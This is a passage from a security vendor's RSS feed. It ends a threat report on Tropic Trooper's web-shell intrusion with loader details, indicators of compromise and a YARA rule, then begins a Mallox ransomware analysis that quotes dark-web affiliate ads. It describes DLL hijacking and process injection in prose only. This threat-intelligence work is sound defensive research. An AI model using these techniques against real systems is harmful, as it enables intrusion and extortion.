  306. <tr>
  307. <td><a href="https://opentip.kaspersky.com/0B9AE998423A207F021F8E61B93BC849/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______a12f2aae6d6a38bc&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">0b9ae998423a207f021f8e61b93bc849</a> (variant 2)</td>
  308. <td>VERSION.dll</td>
  309. <td>c:\Windows\branding\data</td>
  310. <td>2024.05.15</td>
  311. <td>Thu Oct 24 10:23:24 2024 (UTC)</td>
  312. </tr>
  313. <tr>
  314. <td>475aa86ae60c640eec4fdea93b5ed04d (legitimate executable)</td>
  315. <td>inst.exe</td>
  316. <td>c:\Windows\branding\data</td>
  317. <td>2024.04.28</td>
  318. <td>NA</td>
  319. </tr>
  320. </tbody>
  321. </table>
  322. <p>As usual, the same DLL search-order hijacking was used. Note that <pre class="crayon-plain-tag">inst.exe</pre>, which is a legitimate executable, imports three functions from <pre class="crayon-plain-tag">VERSION.dll</pre>:</p>
  323. <ul>
  324. <li>VerQueryValueW;</li>
  325. <li>GetFileVersionInfoW;</li>
  326. <li>GetFileVersionInfoSizeW.</li>
  327. </ul>
  328. <p>Each variant of the dropped <pre class="crayon-plain-tag">VERSION.dll</pre> implements the three exported functions, with minimal differences between both samples. Upon analyzing the three malicious exports from the samples, it is very likely that the attackers built them incrementally. The first sample (MD5: e845563ba35e8d227152165b0c3e769f) was dropped on April 28, immediately after the failed attempt to execute the old loader. This variant had fewer capabilities than the one dropped on May 15, which had a complete implementation for all the malicious capabilities needed to load the same shellcode that would load Crowdoor into memory.</p>
  329. <p>Both variants have compilation timestamps set in the future. Looking at the <pre class="crayon-plain-tag">GetFileVersionInfoSizeW</pre> implementation between the two samples, we see that the most recently dropped sample has the full implementation, while the earlier sample has an empty implementation, implying gradual testing and development of this loader.</p>
  330. <p>The main loading functionality was designed to execute a legitimate <pre class="crayon-plain-tag">msiexec.exe</pre> process, then inject the next stage by writing into its remote address space and creating a remote thread to execute it.</p>
  331. <h2 id="the-victim">The victim</h2>
  332. <p>We sighted this targeted intrusion in a government entity in the Middle East. At the same time, we saw a subset of these samples being used to target a government entity in Malaysia. This matches the type of targets and their location as described in recent Tropic Trooper reports.</p>
  333. <h2 id="attribution">Attribution</h2>
  334. <p>Based on the samples found, we are reassessing the relationship between Tropic Trooper and the FamousSparrow group, <a href="https://www.welivesecurity.com/2021/09/23/famoussparrow-suspicious-hotel-guest/" target="_blank" rel="noopener">reported by ESET in 2021</a>. Some industry reports <a href="https://www.virusbulletin.com/conference/vb2023/abstracts/unveiling-activities-tropic-trooper-2023-deep-analysis-xiangoop-loader-and-entryshell-payload" target="_blank" rel="noopener">link the two groups together</a>.</p>
  335. <p>The following reasons led us to attribute the campaign described in this report and all the observed implants to Tropic Trooper and its associated group, FamousSparrow:</p>
  336. <ul>
  337. <li>Hardcoded RC4 key: the attackers tried to launch a loader previously attributed to Tropic Trooper (MD5: a213873eb55dc092ddf3adbeb242bd44), after they failed to load it from the a.bat file. They relied on a new method maintaining the same approach by using DLL search-order hijacking and used a new loader. Both samples share the same RC4 key.</li>
  338. <li>Post-exploitation tools: some of the post-exploitation tools the attackers used were seen before in other attacks within the same timeframe of this campaign, in which the victims aligned with the targeted regions and industry verticals targeted by this threat group.</li>
  339. <li>The code similarity between the Middle East intrusion sample and the sample found in the third-party malware repository from February 2024 (MD5: c10643b3fb304972c650e593b69faaa1): both were loading Crowdoor into memory. Also, the command-line argument &#8220;2&#8221; found in a variant related to Tropic Trooper samples is very similar to SparrowDoor &#8220;-k&#8221; switch functionality.</li>
  340. </ul>
  341. <h2 id="conclusion">Conclusion</h2>
  342. <p>The event that made us investigate Tropic Trooper was the recurring detection of the China Chopper web shell. Following our investigation into this incident, we found more samples written by Tropic Trooper as well as third-party tools used in the post-exploitation phase. This improved insights into this threat actor&#8217;s TTPs. Notable is the discrepancy in skill set used in various stages of the attack, as well as the choices made after failure. When the actor became aware that their backdoors were detected, they tried to upload newer samples to evade detection, thereby increasing the risk of their new set of samples being detected in the near future. In the same light, the loader sequence goes to great lengths to avoid detection. However, the usage of publicly available tools such as Fscan for further exploitation of the victim&#8217;s network again highlights the discrepancy between some relatively advanced parts of their operation and the &#8220;noisier&#8221; parts.</p>
  343. <p>Investigating the motives of this threat actor led us to conclude that the significance of this intrusion lies in the sighting of a Chinese-speaking actor targeting a content management platform that published studies on human rights in the Middle East, specifically focusing on the situation around Israel-Hamas conflict. Our analysis of this intrusion revealed that this entire system was the sole target during the attack, indicating a deliberate focus on this specific content.</p>
  344. <p>A more detailed analysis of this campaign is available to users of our private Threat Intelligence Portal, with another upcoming report on this activity. To learn more about this report, please contact <a href="mailto:intelreports@kaspersky.com" target="_blank" rel="noopener">intelreports@kaspersky.com</a>.</p>
  345. <h2 id="indicators-of-compromise">Indicators of Compromise</h2>
  346. <p><strong>Umbraco Webshells</strong><br />
  347. <a href="https://opentip.kaspersky.com/3F15C4431AD4573344AD56E8384EBD62/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______795309577e185eac&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">3F15C4431AD4573344AD56E8384EBD62</a><br />
  348. <a href="https://opentip.kaspersky.com/78B47DDA664545542ED3ABE17400C354/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8aa40446c9cf2f75&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">78B47DDA664545542ED3ABE17400C354</a><br />
  349. <a href="https://opentip.kaspersky.com/3B7721715B2842CDFF0AB72BD605A0CE/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______788a8be9f4f2ce62&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">3B7721715B2842CDFF0AB72BD605A0CE</a><br />
  350. <a href="https://opentip.kaspersky.com/868B8A5012E0EB9A48D2DAF7CB7A5D87/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______bfba3c5f645fe707&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">868B8A5012E0EB9A48D2DAF7CB7A5D87</a></p>
  351. <p><strong>Post-Exploitation Tools </strong><br />
  352. <a href="https://opentip.kaspersky.com/149A9E24DBE347C4AF2DE8D135AA4B76/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______92ee2938c7ef30bb&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">149A9E24DBE347C4AF2DE8D135AA4B76</a><br />
  353. <a href="https://opentip.kaspersky.com/103E4C2E4EE558D130C8B59BFD66B4FB/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______1bce986bfd3b9bce&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">103E4C2E4EE558D130C8B59BFD66B4FB</a><br />
  354. <a href="https://opentip.kaspersky.com/E0D9215F64805E0BFF03F4DC796FE52E/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ee976bbfb30079f0&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">E0D9215F64805E0BFF03F4DC796FE52E</a><br />
  355. <a href="https://opentip.kaspersky.com/27C558BD42744CDDC9EDB3FA597D0510/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______2b9b89c057adcf61&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">27C558BD42744CDDC9EDB3FA597D0510</a><br />
  356. <a href="https://opentip.kaspersky.com/4F950683F333F5ED779D70EB38CDADCF/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ff80f54f1ad5aa96&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">4F950683F333F5ED779D70EB38CDADCF</a></p>
  357. <p><strong>File Paths</strong>:<br />
  358. c:\sql\tools\attunitycdcoracle\x64\1033<br />
  359. c:\microsoft.net\framework64\v4.0.30319\temporary asp.net files\root\fc88e889\b64f0276<br />
  360. c:\microsoft.net\framework64\v4.0.30319\temporary asp.net files\root\5b841946\ca5a9bf5</p>
  361. <p><strong>Tropic Trooper Loaders</strong><br />
  362. <a href="https://opentip.kaspersky.com/FD8382EFB0A16225896D584DA56C182C/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______1466f636dc038ceb&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">FD8382EFB0A16225896D584DA56C182C</a><br />
  363. <a href="https://opentip.kaspersky.com/1DD03936BAF0FE95B7E5B54A9DD4A577/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8a465f2128983aef&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">1DD03936BAF0FE95B7E5B54A9DD4A577</a><br />
  364. <a href="https://opentip.kaspersky.com/8A900F742D0E3CD3898F37DBC3D6E054/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______82e090652b08f023&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">8A900F742D0E3CD3898F37DBC3D6E054</a><br />
  365. <a href="https://opentip.kaspersky.com/A213873EB55DC092DDF3ADBEB242BD44/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______24243399edf45b8a&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">A213873EB55DC092DDF3ADBEB242BD44</a><br />
  366. <a href="https://opentip.kaspersky.com/DD7593E9BA80502505C958B9BBBF2838/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4ef4987adedc8b9c&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">DD7593E9BA80502505C958B9BBBF2838</a><br />
  367. <a href="https://opentip.kaspersky.com/2C7EBD103514018BAD223F25026D4DB3/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______10ebee13da5572e5&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">2C7EBD103514018BAD223F25026D4DB3</a><br />
  368. <a href="https://opentip.kaspersky.com/0B9AE998423A207F021F8E61B93BC849/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______a12f2aae6d6a38bc&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">0B9AE998423A207F021F8E61B93BC849</a><br />
  369. <a href="https://opentip.kaspersky.com/E845563BA35E8D227152165B0C3E769F/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______3b8215c376fe077a&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">E845563BA35E8D227152165B0C3E769F</a><br />
  370. <a href="https://opentip.kaspersky.com/A213873EB55DC092DDF3ADBEB242BD44/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______24243399edf45b8a&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">A213873EB55DC092DDF3ADBEB242BD44</a></p>
  371. <p><strong>Domains and IPs</strong><br />
  372. <a href="https://opentip.kaspersky.com/51.195.37.155/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______49d728baf9e97eed&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">51.195.37[.]155</a><br />
  373. <a href="https://opentip.kaspersky.com/162.19.135.182/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______82b2526286a313bb&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">162.19.135[.]182</a><br />
  374. <a href="https://opentip.kaspersky.com/techmersion.com/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______753e9a9c9a156882&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">techmersion[.]com</a></p>
  375. <p><strong>Yara Rules</strong><br />
  376. <pre class="crayon-plain-tag">rule tropictrooper_umbraco_compiled_webshells {
  377. meta:
  378. description = "Rule to detect Tropic Trooper Umbraco webshells .NET sample"
  379. author = "Kaspersky"
  380. copyright = "Kaspersky"
  381. distribution = "DISTRIBUTION IS FORBIDDEN. DO NOT UPLOAD TO ANY MULTISCANNER OR SHARE ON ANY THREAT INTEL PLATFORM"
  382. sample = "3f15c4431ad4573344ad56e8384ebd62"
  383.  
  384. strings:
  385. $s1 = { 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 1F 0A 72 ?? ?? ?? ?? A2 25 1F 0B 72 ?? ?? ?? ?? A2 25 1F 0C 72 ?? ?? ?? ?? A2 25 1F 0D 72 ?? ?? ?? ?? A2 25 1F 0E 72 ?? ?? ?? ?? A2 25 1F 0F 72 ?? ?? ?? ?? A2 25 1F 10 72 ?? ?? ?? ?? A2 25 1F 11 72 ?? ?? ?? ?? A2 25 1F 12 72 ?? ?? ?? ?? A2 25 1F 13 72 ?? ?? ?? ?? A2 25 1F 14 72 ?? ?? ?? ?? A2 25 1F 15 72 ?? ?? ?? ?? A2 25 1F 16 72 ?? ?? ?? ?? A2 25 1F 17 72 ?? ?? ?? ?? A2 25 1F 18 72 ?? ?? ?? ?? A2 }
  386.  
  387. condition:
  388. $s1 and
  389. filesize &lt; 1MB
  390. }</pre>
  391. ]]></content:encoded>
  392. <wfw:commentRss>https://securelist.com/new-tropic-trooper-web-shell-infection/113737/feed/</wfw:commentRss>
  393. <slash:comments>0</slash:comments>
  394. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/05071424/tropic-trooper-featured.jpg" width="1600" height="1005"><media:keywords>full</media:keywords></media:content>
  395. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/05071424/tropic-trooper-featured-1024x643.jpg" width="1024" height="643"><media:keywords>large</media:keywords></media:content>
  396. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/05071424/tropic-trooper-featured-300x188.jpg" width="300" height="188"><media:keywords>medium</media:keywords></media:content>
  397. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/05071424/tropic-trooper-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  398. </item>
  399. <item>
  400. <title>Mallox ransomware: in-depth analysis and evolution</title>
  401. <link>https://securelist.com/mallox-ransomware/113529/</link>
  402. <comments>https://securelist.com/mallox-ransomware/113529/#respond</comments>
  403. <dc:creator><![CDATA[Fedor Sinitsyn, Yanis Zinchenko]]></dc:creator>
  404. <pubDate>Wed, 04 Sep 2024 10:00:02 +0000</pubDate>
  405. <category><![CDATA[Crimeware reports]]></category>
  406. <category><![CDATA[crimeware]]></category>
  407. <category><![CDATA[Data Encryption]]></category>
  408. <category><![CDATA[Encryption]]></category>
  409. <category><![CDATA[Mallox]]></category>
  410. <category><![CDATA[Malware]]></category>
  411. <category><![CDATA[Malware Descriptions]]></category>
  412. <category><![CDATA[Malware Technologies]]></category>
  413. <category><![CDATA[Malware-as-a-Service]]></category>
  414. <category><![CDATA[RaaS]]></category>
  415. <category><![CDATA[Ransomware]]></category>
  416. <category><![CDATA[Windows malware]]></category>
  417. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=113529</guid>
  418.  
  419. <description><![CDATA[In this report, we provide an in-depth analysis of the Mallox ransomware, its evolution, ransom strategy, encryption scheme, etc.]]></description>
  420. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30121417/SL-Mallox-elliptic-curve-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>Mallox is a sophisticated and dangerous family of malicious software that has been causing significant damage to organizations worldwide. In 2023, this ransomware strain demonstrated an uptick in attacks, the overall number of discovered Mallox samples exceeding 700. In the first half of 2024, the malware was still being actively developed, with new versions being released several times a month, while the Mallox RaaS affiliate program advertised on dark web forums was seeking new partners. This article aims to provide a comprehensive technical overview of the ransomware and its history.</p>
  421. <h2 id="background">Background</h2>
  422. <p>Mallox started operating in the first half of 2021, with the first known encryptor sample discovered in May 2021. From the very beginning, this malware was used in human-operated attacks against companies and organizations. The Trojan samples were tailored to each specific victim, with the name of the target company hardcoded in the ransom notes and the extension of the encrypted files. This is why this malware strain is known under many different aliases: the Trojan was not originally named &#8220;Mallox&#8221;, and each researcher introduced their own moniker for this malware.</p>
  423. <p>In order to illustrate the different names used by Mallox variants throughout the family&#8217;s existence, we parsed more than 700 samples and built a table showing the numerous extensions we found in those.</p>
  424. <table width="692">
  425. <tbody>
  426. <tr>
  427. <td width="82"><strong>2021</strong></td>
  428. <td width="83"><strong># of samples</strong></td>
  429. <td width="121"><strong>2022</strong></td>
  430. <td width="83"><strong># of samples</strong></td>
  431. <td width="79"><strong>2023</strong></td>
  432. <td width="83"><strong># of samples</strong></td>
  433. <td width="80"><strong>2024 H1</strong></td>
  434. <td width="83"><strong># of samples</strong></td>
  435. </tr>
  436. <tr>
  437. <td width="82">.architek</td>
  438. <td width="83">1</td>
  439. <td width="121">.avast</td>
  440. <td width="83">1</td>
  441. <td width="79">.bitenc</td>
  442. <td width="83">1</td>
  443. <td width="80">.hmallox</td>
  444. <td width="83">2</td>
  445. </tr>
  446. <tr>
  447. <td width="82">.artiis</td>
  448. <td width="83">1</td>
  449. <td width="121">.bozon</td>
  450. <td width="83">3</td>
  451. <td width="79">.host</td>
  452. <td width="83">1</td>
  453. <td width="80">.ma1x0</td>
  454. <td width="83">5</td>
  455. </tr>
  456. <tr>
  457. <td width="82">.brg</td>
  458. <td width="83">1</td>
  459. <td width="121">.bozon3</td>
  460. <td width="83">1</td>
  461. <td width="79">.mallab</td>
  462. <td width="83">223</td>
  463. <td width="80">.mallox</td>
  464. <td width="83">21</td>
  465. </tr>
  466. <tr>
  467. <td width="82">.herrco</td>
  468. <td width="83">1</td>
  469. <td width="121">.carone</td>
  470. <td width="83">1</td>
  471. <td width="79">.mallox</td>
  472. <td width="83">210</td>
  473. <td width="80">.rmallox</td>
  474. <td width="83">57</td>
  475. </tr>
  476. <tr>
  477. <td width="82">.mallox</td>
  478. <td width="83">6</td>
  479. <td width="121">.consultransom</td>
  480. <td width="83">2</td>
  481. <td width="79">.malloxx</td>
  482. <td width="83">30</td>
  483. <td width="80">.tif</td>
  484. <td width="83">1</td>
  485. </tr>
  486. <tr>
  487. <td width="82">.servimo</td>
  488. <td width="83">1</td>
  489. <td width="121">.deviceZz</td>
  490. <td width="83">1</td>
  491. <td width="79">.malox</td>
  492. <td width="83">63</td>
  493. <td width="80"></td>
  494. <td width="83"></td>
  495. </tr>
  496. <tr>
  497. <td width="82">.tohnichi</td>
  498. <td width="83">3</td>
  499. <td width="121">.exploit</td>
  500. <td width="83">1</td>
  501. <td width="79">.maloxx</td>
  502. <td width="83">8</td>
  503. <td width="80"></td>
  504. <td width="83"></td>
  505. </tr>
  506. <tr>
  507. <td width="82"></td>
  508. <td width="83"></td>
  509. <td width="121">.explus</td>
  510. <td width="83">1</td>
  511. <td width="79">.xollam</td>
  512. <td width="83">7</td>
  513. <td width="80"></td>
  514. <td width="83"></td>
  515. </tr>
  516. <tr>
  517. <td width="82"></td>
  518. <td width="83"></td>
  519. <td width="121">.FARGO</td>
  520. <td width="83">1</td>
  521. <td width="79"></td>
  522. <td width="83"></td>
  523. <td width="80"></td>
  524. <td width="83"></td>
  525. </tr>
  526. <tr>
  527. <td width="82"></td>
  528. <td width="83"></td>
  529. <td width="121">.FARGO2</td>
  530. <td width="83">1</td>
  531. <td width="79"></td>
  532. <td width="83"></td>
  533. <td width="80"></td>
  534. <td width="83"></td>
  535. </tr>
  536. <tr>
  537. <td width="82"></td>
  538. <td width="83"></td>
  539. <td width="121">.FARGO3</td>
  540. <td width="83">20</td>
  541. <td width="79"></td>
  542. <td width="83"></td>
  543. <td width="80"></td>
  544. <td width="83"></td>
  545. </tr>
  546. <tr>
  547. <td width="82"></td>
  548. <td width="83"></td>
  549. <td width="121">.mallox</td>
  550. <td width="83">100</td>
  551. <td width="79"></td>
  552. <td width="83"></td>
  553. <td width="80"></td>
  554. <td width="83"></td>
  555. </tr>
  556. <tr>
  557. <td width="82"></td>
  558. <td width="83"></td>
  559. <td width="121">.prismchigo</td>
  560. <td width="83">1</td>
  561. <td width="79"></td>
  562. <td width="83"></td>
  563. <td width="80"></td>
  564. <td width="83"></td>
  565. </tr>
  566. <tr>
  567. <td width="82"></td>
  568. <td width="83"></td>
  569. <td width="121">.rexiaa</td>
  570. <td width="83">1</td>
  571. <td width="79"></td>
  572. <td width="83"></td>
  573. <td width="80"></td>
  574. <td width="83"></td>
  575. </tr>
  576. </tbody>
  577. </table>
  578. <p>In early 2023, <a href="https://www.suspectfile.com/interview-with-mallox-ransomware-group/">SuspectFile published an interview</a> with individuals who claimed to be the threat actors behind Mallox. In the interview, the actor stated that they purchased the source code for the encryption Trojan in 2022. That might mean that it was previously operated by another group, which would explain the change in the naming pattern: from a unique name for each victim to the &#8220;Mallox&#8221; universal branding.</p>
  579. <p>Most articles and blog posts refer to this strain as Mallox, Tohnichi, Fargo or TargetCompany.</p>
  580. <h3 id="timeline">Timeline</h3>
  581. <p>Judging by the PE timestamps in the discovered samples, which proved to be unaltered and represent the actual release date of the given sample, there were several spikes in new samples: late 2022, early 2023 and late 2023.</p>
  582. <div class="js-infogram-embed" data-id="_/Mcgn3YdviQBqE4NwvWaD" data-type="interactive" data-title="01 EN Mallox data" style="min-height:;"></div>
  583. <p align="center"><strong>Discovered Mallox samples by PE timestamp (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125626/01-en-mallox-data.png" target="_blank" rel="noopener">download</a>)</strong></p>
  584. <p>The number of ITW Mallox samples strongly correlates with Kaspersky Security Network (KSN) telemetry. KSN is our cyberthreat-related data processing system, which works with data consensually provided by Kaspersky users. The graph below shows spikes in unique users who encountered the Mallox ransomware in March 2023 and October 2023, which match the previous graph and indicate increased activity by the group during these periods.</p>
  585. <div class="js-infogram-embed" data-id="_/kEGqxcyN2rqEUiwIaPSb" data-type="interactive" data-title="02 EN Mallox data" style="min-height:;"></div>
  586. <p align="center"><strong>Mallox ransomware activity (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125518/02-en-mallox-data.png" target="_blank" rel="noopener">download</a>)</strong></p>
  587. <h3 id="raas-promotion">RaaS promotion</h3>
  588. <p>A January 2023 post on the dark web forum RAMP by a user named <strong>Mallox</strong> promoted a ransomware-as-a-service affiliate program with the same name.</p>
  589. <div id="attachment_113638" style="width: 801px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125747/Mallox-ransomware-01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113638" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125747/Mallox-ransomware-01.png" alt="The original ad for Mallox RaaS" width="791" height="695" class="size-full wp-image-113638" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125747/Mallox-ransomware-01.png 791w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125747/Mallox-ransomware-01-300x264.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125747/Mallox-ransomware-01-768x675.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125747/Mallox-ransomware-01-398x350.png 398w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125747/Mallox-ransomware-01-740x650.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125747/Mallox-ransomware-01-319x280.png 319w" sizes="(max-width: 791px) 100vw, 791px" /></a><p id="caption-attachment-113638" class="wp-caption-text">The original ad for Mallox RaaS</p></div>
  590. <p>The translation of the post is given below.</p>
  591. <table width="680">
  592. <tbody>
  593. <tr>
  594. <td width="680"><em>Mallox is looking for pentesters with their own material to join the team or as partners</em></p>
  595. <p><em>If you have your own material, we are ready to offer high-quality software and support</em></p>
  596. <p><em>Features:</em><br />
  597. <em>&#8211; Blog</em><br />
  598. <em>&#8211; Web panel with pricing settings per client, chat, Statistics and bonuses</em><br />
  599. <em>&#8211; Encryption: elliptic-curve cryptography + ChaCha20 + many software updates made</em><br />
  600. <em>&#8211; Clean code</em></p>
  601. <p><em>Terms:</em><br />
  602. <em>&#8211; 70% for you, 30% for us</em><br />
  603. <em>&#8211; 80% for you, 20% for us if you have a lot of material and large networks</em><br />
  604. <em>&#8211; Experience is key! Don&#8217;t write if you&#8217;re out to practice, don&#8217;t waste our time, there will be a selection process, we don&#8217;t accept all comers, only a limited number of partners on a long-term basis!</em><br />
  605. <em>&#8211; We will disable inactive ones over time</em><br />
  606. <em>&#8211; We don&#8217;t do business with English speakers</em></p>
  607. <p><em>IM in Jabber for details: [redacted]</em></td>
  608. </tr>
  609. </tbody>
  610. </table>
  611. <p>The ad states that the RaaS owners are looking for &#8220;pentesters&#8221;, i.e. affiliates willing to search for and infiltrate companies. Priority is given to those affiliates that have already obtained unauthorized access to a lot of organizations and/or large networks. Such partners are offered 80% of the profits, while those without a substantial number of readily available victim networks are invited to work for 70% of the ransom.</p>
  612. <p>The poster emphasizes that they are looking only for long-term relationships with experienced affiliates. They are not interested in wasting their time on novice cybercriminals and do not provide any training. The RaaS representative also stresses that they do not work with English-speaking affiliates.</p>
  613. <p>Another RAMP post by the same user in September 2023 said the group was willing to purchase access credentials to victim networks, most likely to launch ransomware attacks on their own.</p>
  614. <table width="680">
  615. <tbody>
  616. <tr>
  617. <td width="680"><em>Market &#8211; Access (SSH/RDP/VNC/Shell) / Ищем поставщика доступов.Сотрудничество\Реализация.</em></p>
  618. <p><em>Заберем доступы под реализацию. Условия сортудничества &#8211; оговариваются лично.</em><br />
  619. <em>&#8211; Интересуют доступы: фортики, циско впн и другие.</em><br />
  620. <em>&#8211; Revenue</em><em> от 10kk</em><em>+</em><br />
  621. <em>&#8211; Юзер в домене.</em><br />
  622. <em>&#8211; AD.</em><br />
  623. <em>&#8211; Гео US/CA/AU/UK/DE.</em><br />
  624. <em>&#8211; Не интересуют: EDU</em><em>/GOV</em><br />
  625. <em>&#8211; Тематика рассматривается индивидуально, госпитали и учебные заведения не иинтересуют.</em><br />
  626. <em>&#8211; Работаем честно и четко, поставщик будет иметь доступ к панели и чатам и видеть все на свои глаза.</em><br />
  627. <em>&#8211; Если будет постоянный поток ТОП мата , готовы предоставить вам лучшие условия и забрать к себе в приват.</em></p>
  628. <p><em>Контакты джаббер: [redacted]</em></td>
  629. </tr>
  630. <tr>
  631. <td width="680"><em>Market &#8211; Access (SSH/RDP/VNC/Shell) / Looking for an access provider. Partnership/Purchases.</em></p>
  632. <p><em>Will buy access credentials for use. Terms to be negotiated in private.</em><br />
  633. <em>&#8211; Interested in access to Fortinet VPN, Cisco VPN, etc.</em><br />
  634. <em>&#8211; Revenue from 10kk+</em><br />
  635. <em>&#8211; Domain user</em><br />
  636. <em>&#8211; AD</em><br />
  637. <em>&#8211; Geo: US/CA/AU/UK/DE</em><br />
  638. <em>&#8211; Not interested in: EDU/GOV</em><br />
  639. <em>&#8211; Industries considered on case-by-case basis. Not interested in hospitals or schools.</em><br />
  640. <em>&#8211; We do business honestly and transparently: the seller will have access to the panel and chat to see it all with their own eyes.</em><br />
  641. <em>&#8211; If there is a constant flow of TOP material, we are ready to give you the best terms and offer you a private deal.</em></p>
  642. <p><em>Jabber contact: [redacted]</em></td>
  643. </tr>
  644. </tbody>
  645. </table>
  646. <p>This post sheds further light on the Mallox RaaS creators&#8217; business model. They look for wealthy victim companies with revenue of $10 million or more in any of the five listed countries. They also aim to avoid attacking educational, governmental and healthcare organizations.</p>
  647. <h3 id="statistics-on-the-raas-affiliates">Statistics on the RaaS affiliates</h3>
  648. <p>By analyzing Mallox samples, we were able to determine that starting in 2022, the developers added C&amp;C reporting to their malware. This sends information about each infected computer, but more interestingly, it also appends an affiliate ID string to the Trojan&#8217;s HTTP request. We extracted these affiliate IDs from the samples we had obtained and built a data model, which allowed us to investigate the distribution of samples across partners throughout the evolution of the RaaS program.</p>
  649. <table width="426">
  650. <tbody>
  651. <tr>
  652. <td width="310"><strong>Affiliate ID string</strong></td>
  653. <td width="116"><strong># of samples</strong></td>
  654. </tr>
  655. <tr>
  656. <td width="310">admin</td>
  657. <td width="116">72</td>
  658. </tr>
  659. <tr>
  660. <td width="310">amigosbos9k</td>
  661. <td width="116">55</td>
  662. </tr>
  663. <tr>
  664. <td width="310">bitenc</td>
  665. <td width="116">1</td>
  666. </tr>
  667. <tr>
  668. <td width="310">bloodbeard</td>
  669. <td width="116">2</td>
  670. </tr>
  671. <tr>
  672. <td width="310">caneddy</td>
  673. <td width="116">1</td>
  674. </tr>
